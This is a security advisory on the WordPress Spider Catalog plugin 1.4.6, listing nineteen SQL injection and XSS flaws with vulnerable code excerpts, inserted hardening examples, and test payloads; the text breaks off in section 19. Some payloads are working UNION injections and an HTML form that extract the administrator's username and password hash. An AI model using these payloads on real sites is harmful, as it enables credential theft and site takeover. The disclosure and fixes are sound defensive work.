WordPress Spider Catalog Multiple Vulnerabilities

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 

http://wordpress.org/extend/plugins/catalog/


http://web-dorado.com/products/wordpress-catalog.html

 
The current version, 1.4.6, is vulnerable; older versions were not tested.
 
 
###############################################################################
1. SQL Injection in Spider Catalog Shortcodes
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied shortcode parameter "id"
Preconditions:
  1. must be logged in as a user with posting privileges (Author role or
  higher by default)
 
 
Php script "catalog.php" line 101:
------------------------[ source code start ]----------------------------------
add_shortcode('Spider_Catalog_Category', 'Spider_Catalog_Products_list_shotrcode');
 
function Spider_Catalog_Single_product_shotrcode($atts) {
     extract(shortcode_atts(array(
              'id' => '',
     ), $atts));
     return spider_cat_Single_product($id);
}
add_shortcode('Spider_Catalog_Product', 'Spider_Catalog_Single_product_shotrcode');
..
function spider_cat_Single_product($id)
{
..
  return        front_end_single_product($id);
------------------------[ source code end ]------------------------------------
 
Two shortcodes are defined, "Spider_Catalog_Category" and
"Spider_Catalog_Product", and both are vulnerable to SQL injection through the
shortcode parameter "id".
Taking "Spider_Catalog_Product" as the example: the "id" attribute is passed
unchanged to spider_cat_Single_product() and from there to
front_end_single_product().
 
Php script "front_end_functions.php" line 18:
------------------------[ source code start ]----------------------------------
function front_end_single_product($id)
{
..
 $product_id=$id;
..
 $query = "SELECT ".$wpdb->prefix."spidercatalog_products.*, 
   ".$wpdb->prefix."spidercatalog_product_categories.name as cat_name FROM 
   ".$wpdb->prefix."spidercatalog_products left join 
   ".$wpdb->prefix."spidercatalog_product_categories on  
   ".$wpdb->prefix."spidercatalog_products.category_id=
   ".$wpdb->prefix."spidercatalog_product_categories.id where
   ".$wpdb->prefix."spidercatalog_products.id='".$product_id."' and 
   ".$wpdb->prefix."spidercatalog_products.published = '1' ";
 $rows = $wpdb->get_results($query);
------------------------[ source code end ]------------------------------------
 
As seen above, "id" is concatenated straight into the SQL string with no
casting, escaping or prepare(), which is the SQL injection.
 
Tests:
 
Log in as a user with posting privileges and put the following shortcode into a post:
 
[Spider_Catalog_Product id="0' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12#"]
 
Now open the page containing that post: the MySQL version string is rendered in
place of a product field. (The UNION has to supply as many columns as the
original SELECT returns, 12 here; column 4 is one the template prints.)
 
Second test:
 
[Spider_Catalog_Product id="0' UNION SELECT 1,2,3,(SELECT CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE ID=1),5,6,7,8,9,10,11,12#"]
 
As a result, the username and password hash of the WordPress user with ID 1
(usually the administrator) are revealed.
 
The other shortcode is exploited the same way; its "id" is embedded unquoted,
so the payload needs no closing quote, and the column count is 8:
 
[Spider_Catalog_Category id="0 UNION SELECT 1,2,@@version,4,5,6,7,8#"]
 
.. and the MySQL version appears in the HTML source:
 
<a style="cursor:pointer;" onclick="catt_idd_1(5.5.30)" >Back to Catalog
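The shortcode injection, like the integer-id cases in sections 3 to 8, 11, 14 and 15, comes down to concatenating an attacker-controlled id into SQL. The block below is an added example, not code from the plugin or from this advisory, of how the Spider_Catalog_Product path should look: the attribute is coerced with absint() and the statement is built with $wpdb->prepare(). The table names and the shortcode name are the plugin's; the function names ending in _safe and the product column "name" are assumed for illustration.

```php
<?php
// Added example, not the plugin's code: the Spider_Catalog_Product shortcode path
// rewritten so that "id" can only reach SQL as an integer. The helper names
// ending in _safe and the product column "name" are assumed for illustration.

add_shortcode('Spider_Catalog_Product', 'spider_cat_single_product_shortcode_safe');

function spider_cat_single_product_shortcode_safe($atts) {
    $atts = shortcode_atts(array('id' => 0), $atts, 'Spider_Catalog_Product');
    // absint() reduces "0' UNION SELECT ..." to 0: only digits survive.
    $id = absint($atts['id']);
    if ($id === 0) {
        return '';
    }
    return spider_cat_single_product_safe($id);
}

function spider_cat_single_product_safe($id) {
    global $wpdb;
    $products   = $wpdb->prefix . 'spidercatalog_products';
    $categories = $wpdb->prefix . 'spidercatalog_product_categories';

    // prepare() formats %d as an integer. The table names are interpolated
    // because they come from $wpdb->prefix, not from the request.
    $sql = $wpdb->prepare(
        "SELECT p.*, c.name AS cat_name
           FROM {$products} AS p
           LEFT JOIN {$categories} AS c ON p.category_id = c.id
          WHERE p.id = %d AND p.published = 1",
        $id
    );
    $row = $wpdb->get_row($sql);
    if (!$row) {
        return '';
    }
    // The same data is later rendered into HTML, so it is escaped for that
    // context as well (compare the stored XSS findings in sections 16 and 17).
    return '<div class="spider-product">'
         . '<h3>' . esc_html($row->name) . '</h3>'
         . '<span class="cat">' . esc_html($row->cat_name) . '</span>'
         . '</div>';
}
```

The same two moves, absint() on the way in and %d in prepare(), close every admin-side finding below whose vector is a numeric id or del_id; none of those queries needs anything but an integer.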
 
 
###############################################################################
2. SQL Injection in "catalog.php" function "catalog_after_search_results()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied parameter "s"
Preconditions: none
 
 
Php script "catalog.php" line 39:
------------------------[ source code start ]----------------------------------
function catalog_after_search_results($query){
        global $wpdb;
        if(isset($_REQUEST['s']) && $_REQUEST['s']){
        $serch_word=htmlspecialchars(stripslashes($_REQUEST['s']));
        $query=str_replace($wpdb->prefix."posts.post_content",
          gen_string_catalog_search($serch_word,$wpdb->prefix.'posts.post_content')
          ." ".$wpdb->prefix."posts.post_content",$query);
        }       
    return $query;
 
}
add_filter( 'posts_request', 'catalog_after_search_results');
------------------------[ source code end ]------------------------------------
 
The user-supplied parameter "s" is run through stripslashes() and
htmlspecialchars() and then spliced into the SQL that WordPress search builds.
stripslashes() undoes the quoting added by magic_quotes_gpc (and by WordPress'
own wp_magic_quotes()), and htmlspecialchars() is used as if it were an SQL
escaper, but it is an HTML encoder: by default it leaves the single quote
untouched, so a quote inside "s" terminates the string literal and the rest of
the value is parsed as SQL.
Exploitation is two-staged ("nested" SQL injection): the first query, which
gen_string_catalog_search() runs against the category table, is made to return
a string of the attacker's choosing, and the plugin then concatenates that
string into the main posts query, where it is executed as a second injection.
 
Tests:
 
First make sure that WordPress displays SQL errors. Open the file
"wp-includes/wp-db.php" and change the line
 
var $show_errors = false;
 
to
 
var $show_errors = true;
 
(calling $wpdb->show_errors() at runtime has the same effect). Then issue the
GET request:
 
http://localhost/wp351/?s=war'axe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near 'axe%')
OR (name LIKE '%war'axe%')' at line 1]
SELECT * FROM wp_spidercatalog_product_categories WHERE
(description LIKE '%war'axe%') OR (name LIKE '%war'axe%')
 
This confirms the SQL injection. Exploitation works over either GET or POST; the
PoC below uses POST. The outer UNION is injected into the category query shown
above. Its first column is built with CONCAT(): the hex literals 0x27 and 0x23
supply the leading quote and the trailing "#" without having to embed them in
the outer literal, so the category query returns the string
')))UNION SELECT 1,...,1#'. That string is what the plugin concatenates into
the WordPress posts query, where the inner UNION runs.
 
<html><body><center>
<form action="http://localhost/wp351/" method="post">
<input type="hidden" name="s" value="')UNION SELECT CONCAT(0x27,')))UNION SELECT 1,1,1,1,1,(SELECT CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE ID=1),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1',0x23),1,1,1,1,1,1,1#">
<input type="submit" value="Test">
</form>
</center></body></html>
 
After clicking "Test", the POST request is made and the resulting page reveals
the username and password hash of the WordPress user with ID 1.
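The correct fix is SQL escaping of the LIKE term, not HTML encoding. Below is an added example, not the plugin's code, of catalog_after_search_results() rewritten with $wpdb->esc_like() and $wpdb->prepare() at both stages of the query. gen_string_catalog_search() is not reproduced in the advisory, so the clause this version splices into the posts query (an OR over the names of matching categories) is an assumption about what the plugin intends; the function name with the _safe suffix is likewise made up for the example.

```php
<?php
// Added example, not the plugin's code. gen_string_catalog_search() is not shown
// in the advisory, so the clause this version splices into the posts query (an OR
// over matching category names) is an assumption about what the plugin intends.

add_filter('posts_request', 'catalog_after_search_results_safe');

function catalog_after_search_results_safe($query) {
    global $wpdb;
    if (!isset($_REQUEST['s']) || $_REQUEST['s'] === '') {
        return $query;
    }
    // stripslashes() is still needed because WordPress slashes request data
    // itself (wp_magic_quotes()). What replaces htmlspecialchars() is esc_like()
    // (WordPress 4.0+; like_escape() before that), which neutralises % and _
    // inside a LIKE pattern, plus prepare(), which quotes the whole value as an
    // SQL string literal. A quote in "war'axe" therefore stays inside the
    // literal instead of ending it.
    $word       = '%' . $wpdb->esc_like(stripslashes($_REQUEST['s'])) . '%';
    $categories = $wpdb->prefix . 'spidercatalog_product_categories';

    $names = $wpdb->get_col($wpdb->prepare(
        "SELECT name FROM {$categories} WHERE description LIKE %s OR name LIKE %s",
        $word,
        $word
    ));
    if (empty($names)) {
        return $query;
    }

    // Second stage: the names came out of the database, but an attacker may have
    // put them there (or, as in section 2, made the first query return an
    // arbitrary string), so each one is escaped again as it enters the outer
    // query. Treating first-stage results as trusted is what made the nested
    // injection possible.
    $col    = $wpdb->prefix . 'posts.post_content';
    $clause = '';
    foreach ($names as $name) {
        $clause .= $wpdb->prepare("{$col} LIKE %s OR ", '%' . $wpdb->esc_like($name) . '%');
    }
    return str_replace($col, $clause . $col, $query);
}
```

The rule the example applies is that every value crossing into a new SQL statement is escaped for that statement, regardless of where it was read from; a value that was safe in the first query is just data again once it is being spliced into the second.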
 
 
 
###############################################################################
3. SQL Injection in "Categories.php" function "change_cat()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "Categories.php" line 491:
------------------------[ source code start ]----------------------------------
function change_cat( $id ){
  global $wpdb;
  $published=$wpdb->get_var("SELECT published FROM 
    ".$wpdb->prefix."spidercatalog_product_categories WHERE `id`=".$id );
------------------------[ source code end ]------------------------------------
 
Tests:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=publish_cat&id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT published FROM wp_spidercatalog_product_categories WHERE `id`=waraxe
 
This confirms the SQL injection.
 
 
###############################################################################
4. SQL Injection in "Categories.php" function "editCategory()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "Categories.php" line 338:
------------------------[ source code start ]----------------------------------
function editCategory($id)
{
..
  $query="SELECT * FROM ".$wpdb->prefix."spidercatalog_product_categories
    WHERE id='".$id."'";
  $row=$wpdb->get_row($query);
------------------------[ source code end ]------------------------------------
 
Tests:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=edit_cat&id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_spidercatalog_product_categories WHERE id!=waraxe and parent=0
 
This confirms the SQL injection. Note that the statement that fails is not the
quoted one reproduced above but another query on the same code path that embeds
"id" unquoted; the quoted variant is reached with a payload that closes the quote.
 
 
###############################################################################
5. SQL Injection in "Categories.php" function "apply_cat()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "Categories.php" line 570:
------------------------[ source code start ]----------------------------------
function apply_cat($id)
{
..
  $cat_row=$wpdb->get_results("SELECT * FROM
  ".$wpdb->prefix."spidercatalog_product_categories
    WHERE id!=" .$_GET['id']. " ");
------------------------[ source code end ]------------------------------------
 
Tests:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=save&id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_spidercatalog_product_categories WHERE id!=waraxe
 
This confirms the SQL injection.
 
 
###############################################################################
6. SQL Injection in "Categories.php" function "removeCategory()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "Categories.php" line 519:
------------------------[ source code start ]----------------------------------
function removeCategory($id)
{
..
  $sql_remov_tag="DELETE FROM ".$wpdb->prefix."spidercatalog_product_categories
    WHERE id='".$id."'";
  if(!$wpdb->query($sql_remov_tag))
------------------------[ source code end ]------------------------------------
 
Tests:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=remove_cat&id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
UPDATE wp_spidercatalog_product_categories SET parent="0" WHERE parent=waraxe
 
This confirms the SQL injection. The failing statement is an UPDATE on the same
code path that embeds "id" unquoted; the quoted DELETE shown above is reached
with a payload that closes the quote.
 
 
###############################################################################
7. SQL Injection in "products.php" function "update_prad_cat()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied POST parameter "ordering"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 364:
------------------------[ source code start ]----------------------------------
function  update_prad_cat($id){
..
$corent_ord=$wpdb->get_var('SELECT `ordering`
  FROM '.$wpdb->prefix.'spidercatalog_products WHERE id=\''.$id.'\'');
..
if($corent_ord>$_POST["ordering"])
{
  $rows=$wpdb->get_results('SELECT * FROM '.$wpdb->prefix.'spidercatalog_products
  WHERE ordering>='.$_POST["ordering"].' AND id<>\''.$id.'\'  ORDER BY `ordering` ASC ');
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now, logged in as a WordPress admin, submit the HTML form below:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=apply&id=0" method="post">
<input type="hidden" name="ordering" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
 
After pressing the "Test" button, the SQL error is shown on the resulting page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_spidercatalog_products WHERE ordering>=waraxe ORDER BY `ordering` ASC
 
This confirms the SQL injection. The failing statement is another query in the
same function that embeds "ordering" in the same way as the one quoted above.
 
 
###############################################################################
8. SQL Injection in "products.php" function "change_prod()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 245:
------------------------[ source code start ]----------------------------------
function change_prod( $id ){
..
  $published=$wpdb->get_var("SELECT published 
    FROM ".$wpdb->prefix."spidercatalog_products WHERE `id`=".$id );
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=unpublish_prad&id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT published FROM wp_spidercatalog_products WHERE `id`=waraxe
 
This confirms the SQL injection.
 
 
###############################################################################
9. SQL Injection in "products.php" function "spider_cat_prod_rev()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied POST parameter "order_by"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 745:
------------------------[ source code start ]----------------------------------
function   spider_cat_prod_rev($id)
{
..
  if(isset($_POST['page_number']))
  {
    if($_POST['asc_or_desc'])
    {
      $sort["sortid_by"]=$_POST['order_by'];
..
        $order="ORDER BY ".$sort["sortid_by"]." ASC";
..
$query = "SELECT * FROM ".$wpdb->prefix."spidercatalog_product_reviews".
         $where." ". $order." "." LIMIT ".$limit.",20";
$rows = $wpdb->get_results($query);         
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now, logged in as a WordPress admin, submit the HTML form below:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=edit_reviews&id=0" method="post">
<input type="hidden" name="order_by" value="waraxe">
<input type="hidden" name="page_number" value="1">
<input type="hidden" name="asc_or_desc" value="1">
<input type="submit" value="Test">
</form>
</center></body></html>
 
After pressing the "Test" button, the SQL error is shown on the resulting page:
 
WordPress database error: [Unknown column 'waraxe' in 'order clause']
SELECT * FROM wp_spidercatalog_product_reviews WHERE product_id='0' ORDER BY waraxe ASC LIMIT 0,20
 
This confirms the SQL injection. Because the value lands in the ORDER BY
clause, it cannot be fixed with quoting alone: an identifier position needs a
whitelist of permitted column names.
 
 
###############################################################################
10. SQL Injection in "products.php" function "delete_rev()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied POST parameter "post"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 817:
------------------------[ source code start ]----------------------------------
function delete_rev($id){
.
  $cid = $_POST['post'];
..
  $cids  = implode(',', $cid);
  $query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_reviews
    WHERE id IN ( ".$cids." )";
  if(!$wpdb->query($query))         
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now, logged in as a WordPress admin, submit the HTML form below:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_reviews" method="post">
<input type="hidden" name="post[]" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
 
After pressing the "Test" button, the SQL error is shown on the resulting page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_reviews WHERE id IN ( waraxe )
 
This confirms the SQL injection.
 
 
###############################################################################
11. SQL Injection in "products.php" function "delete_single_review()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "del_id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 854:
------------------------[ source code start ]----------------------------------
function delete_single_review($id)
{
..
  $del_id=$_GET['del_id'];
  $query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_reviews
    WHERE id=".$del_id;
  if(!$wpdb->query($query))
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_review&del_id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_reviews WHERE id=waraxe
 
This confirms the SQL injection.
 
 
###############################################################################
12. SQL Injection in "products.php" function "spider_cat_prod_rating()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied POST parameter "order_by"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 940:
------------------------[ source code start ]----------------------------------
function   spider_cat_prod_rating($id)
{
..
  if(isset($_POST['page_number']))
  {
    if($_POST['asc_or_desc'])
    {
      $sort["sortid_by"]=$_POST['order_by'];
..
    $order="ORDER BY ".$sort["sortid_by"]." ASC";
..
$query = "SELECT * FROM ".$wpdb->prefix."spidercatalog_product_votes"
   .$where." ". $order." "." LIMIT ".$limit.",20";
$rows = $wpdb->get_results($query);         
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now, logged in as a WordPress admin, submit the HTML form below:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=edit_rating&id=0" method="post">
<input type="hidden" name="order_by" value="waraxe">
<input type="hidden" name="page_number" value="1">
<input type="hidden" name="asc_or_desc" value="1">
<input type="submit" value="Test">
</form>
</center></body></html>
 
After pressing the "Test" button, the SQL error is shown on the resulting page:
 
WordPress database error: [Unknown column 'waraxe' in 'order clause']
SELECT * FROM wp_spidercatalog_product_votes WHERE product_id='0' ORDER BY waraxe ASC LIMIT 0,20
 
This confirms the SQL injection.
 
 
###############################################################################
13. SQL Injection in "products.php" function "delete_ratings()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied POST parameter "post"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 1014:
------------------------[ source code start ]----------------------------------
function delete_ratings($id){
..
  $cid = $_POST['post'];
..
  $cids  = implode(',', $cid);
  $query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_votes
    WHERE id IN ( ".$cids." )";
 
  if(!$wpdb->query($query))    
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now, logged in as a WordPress admin, submit the HTML form below:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_ratings" method="post">
<input type="hidden" name="post[]" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
 
After pressing the "Test" button, the SQL error is shown on the resulting page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_votes WHERE id IN ( waraxe )
 
This confirms the SQL injection.
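Two of the fragments above cannot be handed to $wpdb->prepare() as placeholders: the ORDER BY column in sections 9 and 12 is an identifier, and the IN (...) list in sections 10 and 13 has a variable length. The block below is an added example, not the plugin's code, of how both are handled: a fixed whitelist for the column name and per-element integer coercion for the list. The whitelist contents, the page-number semantics and the function names are assumptions; the table and column names are the plugin's.

```php
<?php
// Added example, not the plugin's code: the two query fragments in sections 9,
// 10, 12 and 13 that prepare() cannot take as placeholders (an ORDER BY column
// name and a variable-length IN list), built without injecting request data.
// The whitelist of sortable columns and the page-number semantics are assumed.

function spider_cat_reviews_query($product_id, $page_number, $order_by, $asc_or_desc) {
    global $wpdb;
    $table = $wpdb->prefix . 'spidercatalog_product_reviews';

    // Identifiers: map the request value onto a fixed list of column names.
    // Anything not on the list falls back to the default and never reaches SQL.
    $sortable  = array('id', 'product_id', 'date'); // assumed column names
    $order_col = in_array($order_by, $sortable, true) ? $order_by : 'id';
    $order_dir = $asc_or_desc ? 'ASC' : 'DESC';

    // Page numbers are taken as 1-based (assumed); anything odd becomes page 1.
    $offset = (max(1, (int) $page_number) - 1) * 20;

    // $order_col and $order_dir are interpolated, but both were chosen from
    // literals above; the two values that originate from the request go through
    // %d placeholders.
    return $wpdb->prepare(
        "SELECT * FROM {$table} WHERE product_id = %d ORDER BY {$order_col} {$order_dir} LIMIT %d, 20",
        $product_id,
        $offset
    );
}

function spider_cat_delete_reviews_query(array $posted_ids) {
    global $wpdb;
    $table = $wpdb->prefix . 'spidercatalog_product_reviews';

    // IN list: every element is forced to a non-negative integer before implode(),
    // so "waraxe" becomes 0 and "1) OR 1=1#" becomes 1; only digits are joined.
    $ids = array_filter(array_map('absint', $posted_ids));
    if (empty($ids)) {
        return null; // nothing valid to delete; "IN ()" is not valid SQL anyway
    }
    return "DELETE FROM {$table} WHERE id IN (" . implode(',', $ids) . ")";
}
```

The votes table used in sections 12 and 13 takes exactly the same treatment with the table name swapped; the point of the example is that a placeholder is the right tool for values, while identifiers and list lengths have to be constrained structurally, by choosing from known-good literals or by coercing each element to the type the column holds.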
 
 
###############################################################################
14. SQL Injection in "products.php" function "delete_single_rating()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "del_id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 1051:
------------------------[ source code start ]----------------------------------
function delete_single_rating($id)
{
..
  $del_id=$_GET['del_id'];
  $query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_votes
    WHERE id=".$del_id;
  if(!$wpdb->query($query))
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_rating&del_id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_votes WHERE id=waraxe
 
This confirms the SQL injection.
 
 
###############################################################################
15. SQL Injection in "products.php" function "update_s_c_rating()"
###############################################################################
 
Reason:
  1. insufficient sanitization of user-supplied data
Attack vector:
  1. user-supplied GET parameter "id"
Preconditions:
  1. must be logged in as WordPress admin
 
 
Php script "products.php" line 1086:
------------------------[ source code start ]----------------------------------
function update_s_c_rating($id){
..
$rows=$wpdb->get_col("SELECT `id` FROM
  ".$wpdb->prefix."spidercatalog_product_votes WHERE product_id=".$id);
------------------------[ source code end ]------------------------------------
 
Test:
 
First make sure that WordPress displays SQL errors (set $show_errors = true in
"wp-includes/wp-db.php", as in section 2).
 
Now log in as a WordPress admin and issue the GET request below:
 
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=s_p_apply_rating&id=waraxe
 
As a result, the SQL error is shown on the page:
 
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT `id` FROM wp_spidercatalog_product_votes WHERE product_id=waraxe
 
This confirms the SQL injection.
 
 
###############################################################################
16. Stored XSS in Spider Catalog category name
###############################################################################
 
Reason:
  1. insufficient sanitization of html output
Preconditions:
  1. must be logged in as user with "manage_options" privileges (admin by default)
 
Test:
 
1. Add or edit a Spider Catalog category and set its name to:
 
test<script>alert(123);</script>
 
2. View the added/edited category:
 
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=edit_cat&id=2
 
Result: a JavaScript alert box pops up, confirming the stored XSS.
 
 
###############################################################################
17. Stored XSS in Spider Catalog product name
###############################################################################
 
Reason:
  1. insufficient sanitization of html output
Preconditions:
  1. must be logged in as user with "manage_options" privileges (admin by default)
 
Test:
 
1. Add or edit a Spider Catalog product and set its name to:
 
test<script>alert(123);</script>
 
2. View the added/edited product:
 
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=edit_prad&id=5
 
Result: a JavaScript alert box pops up, confirming the stored XSS.
 
 
###############################################################################
18. Reflected XSS in "Categories.html.php"
###############################################################################
 
Reason:
  1. insufficient sanitization of html output
Attack vectors:
  1. user-supplied POST parameters "search_events_by_title", "asc_or_desc" and
  "order_by"
Preconditions:
  1. logged in as user with "manage_options" privileges (admin by default)
 
 
Php script "Categories.html.php" line 90:
------------------------[ source code start ]----------------------------------
if(isset($_POST['serch_or_not'])) {if($_POST['serch_or_not']=="search"){
  $serch_value=$_POST['search_events_by_title']; }else{$serch_value="";}} 
..
<input type="text" name="search_events_by_title" value="'.$serch_value.'"
..
<input type="hidden" name="asc_or_desc" id="asc_or_desc"
  value="<?php if(isset($_POST['asc_or_desc'])) echo $_POST['asc_or_desc'];?>"  />
<input type="hidden" name="order_by" id="order_by"
  value="<?php if(isset($_POST['order_by'])) echo $_POST['order_by'];?>"  />
------------------------[ source code end ]------------------------------------
 
Test:
 
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog" method="post">
<input type="hidden" name="serch_or_not" value="search">
<input type="hidden" name="search_events_by_title" value='"><script>alert(111);</script>'>
<input type="hidden" name="asc_or_desc" value='"><script>alert(222);</script>'>
<input type="hidden" name="order_by" value='"><script>alert(333);</script>'>
<input type="submit" value="Test">
</form>
</center></body></html>
 
Result: JavaScript alert boxes (one per parameter) pop up, confirming the
reflected XSS. Each payload closes the value="..." attribute it is echoed into
with "> before starting its own script tag.
 
 
###############################################################################
19. Reflected XSS in "Products.html.php"
###############################################################################
 
Reason:
  1. insufficient sanitization of html output
Attack vectors:
  1. user-supplied POST parameters "search_events_by_title", "asc_or_desc" and
  "order_by"
Preconditions:
  1. logged in as user with "manage_options" privileges (admin by default)
 
 
Php script "Products.html.php" line 91:
------------------------[ source code start ]----------------------------------
if(isset($_POST['serch_or_not'])) {if($_POST['serch_or_not']=="search"){
  $serch_value=$_POST['search_events_by_title']; }else{$serch_value="";}} 
..
<input type="text" name="search_events_by_title" value="'.$serch_value.'"
..
<input type="hidden" name="asc_or_desc" id="asc_or_desc"
